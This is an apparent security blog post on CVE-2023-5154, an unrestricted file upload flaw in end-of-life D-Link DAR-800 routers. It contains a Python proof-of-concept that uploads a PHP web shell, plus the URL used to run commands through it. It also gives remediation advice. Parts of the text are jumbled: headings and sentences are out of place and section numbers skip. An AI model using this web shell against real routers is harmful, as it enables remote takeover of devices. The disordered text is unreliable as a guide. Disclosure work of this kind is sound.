CVE-2023-5154 - Unrestricted File Upload in D-Link DAR-800 Routers (End-of-Life, Exploit Details & Remediation)

In late 2023, a critical security vulnerability—CVE-2023-5154—was disclosed affecting D-Link DAR-800 routers up to firmware released on 2015-12-31. The vulnerability, tracked as VDB-240250, allows attackers to remotely upload arbitrary files via a flaw in the /sysmanage/changelogo.php endpoint. Since the DAR-800 is an end-of-life product no longer supported by D-Link, this security hole remains unpatched and exposes any still-in-use device to major risks.

This detailed post will walk you through the specifics of the vulnerability, demonstrate an example exploit, and provide remediation guidance.

1. Vulnerability Overview

CVE-ID: CVE-2023-5154
Product: D-Link DAR-800 (all versions up to 2015-12-31)
File: /sysmanage/changelogo.php
Parameter: file_upload
Vulnerability Type: Unrestricted File Upload
CVSS: Critical
Exploit Status: Public / Exploitable Remotely
Reference: VulnDB VDB-240250

What’s the core issue?

The router’s web management console allows administrators to upload new logos via /sysmanage/changelogo.php. Due to missing validation on the file type, path, and contents, attackers can upload any file—including scripts (like PHP shells) or binaries—directly onto the device. This allows them to execute arbitrary code with the webserver’s permissions.

Disable or brick the device.

No authentication is required if the management interface is exposed to the internet or a local network.

3. How the Exploit Works

Normally, /sysmanage/changelogo.php is only meant for uploading image files. Here’s what a legitimate POST request might look like with an image:

POST /sysmanage/changelogo.php HTTP/1.1
Host: router-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file_upload"; filename="logo.png"
Content-Type: image/png

(binary data)
------WebKitFormBoundary--

Restrict file content

This means you can upload a web shell, for example, as shell.php.

Below is a proof-of-concept script to upload a PHP web shell

import requests

url = 'http://<router-ip>/sysmanage/changelogo.php';
malicious_payload = {
    'file_upload': ('shell.php', b'<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
}

r = requests.post(url, files=malicious_payload)
print('Status:', r.status_code)

After upload, visit:
http://<router-ip>/web/path/to/uploads/shell.php?cmd=ls

*The path may vary; check directory listing or server config.*

4. Real-World Exploitation

Exploits for this vulnerability are public and easy to execute (see Exploit-DB 51634 as a reference for similar cases). Attackers will commonly:

Scan for open management interfaces

- Upload backdoors/web shells

No patch will be provided.

- See D-Link End-of-Life page for confirmation.

Disconnect the device from the internet and critical networks immediately.

2. Replace with a modern, supported firewall/router.
3. If temporary continued use is necessary, restrict access to the management interface—only expose via a trusted, isolated network segment.

7. References

- VulnDB VDB-240250
- CVE-2023-5154 Record on MITRE *(may update as indexed)*
- D-Link End of Life Announcement
- Exploit-DB Example - Unrestricted Upload (contextual reference)

8. Conclusion

CVE-2023-5154 is a classic example of why unsupported and unmaintained network devices are a security nightmare. Unrestricted file upload enables trivially easy full compromise of affected D-Link DAR-800 routers.

If you’re still running one, please retire and replace it immediately—no fix is coming.

Stay safe! And for further reading, you can learn about secure file upload best practices here.


*This post is an exclusive deep dive. Share to help others secure their networks!*

Timeline

Published on: 09/25/2023 03:15:09 UTC
Last modified on: 11/07/2023 04:23:33 UTC